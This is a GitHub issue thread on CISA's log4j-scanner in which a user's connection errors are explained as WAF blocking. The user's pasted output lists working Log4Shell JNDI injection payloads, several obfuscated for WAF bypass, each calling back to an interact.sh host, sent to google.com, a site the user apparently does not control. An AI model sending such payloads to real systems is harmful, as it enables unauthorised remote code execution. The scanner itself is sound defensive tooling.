search

cisagov / log4j-scanner

log4j-scanner is a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.
1.28k stars 215 forks source link

Does not work with http or http://***:80 #22

Closed PrestonD88 closed 2 years ago

PrestonD88 commented 2 years ago

I Get following error when i try for http protocol

EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))[0m

genericcontributor commented 2 years ago

@PrestonD88

A few follow-up questions:

  1. Can you provide a screenshot and command you attempted to run?
  2. Did you try this on multiple HTTP hosts or just one?

This can be caused by the two sides of the connection disagreeing over whether the connection timed out or not during a keepalive.

PrestonD88 commented 2 years ago

Even simple http to google.com gave same response.

python3 log4j-scan.py -u "http://google.com" --waf-bypass

[•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). [%] Checking for Log4j RCE CVE-2021-44228. [•] URL: http://google.com [•] URL: http://google.com | PAYLOAD: ${jndi:ldap://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx} EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None)) [•] URL: http://google.com | PAYLOAD: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx} EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None)) [•] URL: http://google.com | PAYLOAD: ${${::-j}ndi:rmi://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx} EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None)) [•] URL: http://google.com | PAYLOAD: ${jndi:rmi://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh} EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None)) [•] URL: http://google.com | PAYLOAD: ${${lower:jndi}:${lower:rmi}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx} EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None)) [•] URL: http://google.com | PAYLOAD: ${${lower:${lower:jndi}}:${lower:rmi}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx} EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None)) [•] URL: http://google.com | PAYLOAD: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx} EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None)) [•] URL: http://google.com | PAYLOAD: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh/gpyd2jx} EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None)) [•] URL: http://google.com | PAYLOAD: ${jndi:dns://google.com.5k0911m2v8bf475r8450315h37smi198b.interact.sh} EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None)) [•] Payloads sent to all URLs. Waiting for DNS OOB callbacks. [•] Waiting... [•] Targets does not seem to be vulnerable.

genericcontributor commented 2 years ago

@PrestonD88

Thanks for the output!

We believe this is normal behavior.

Google has WAF in front of their applications and are likely dropping/rejecting your packets.

An existing connection was forcibly closed by the remote host'

It appears like that GET/POST requests are being performed by the script. http://google.com is redirected to https://www.google.com as well. You can use --disable-http-redirects to prevent this behavior from happening.

Hope this helps. Closing this issue since the HTTP endpoint does not appear to hinder the scanning itself.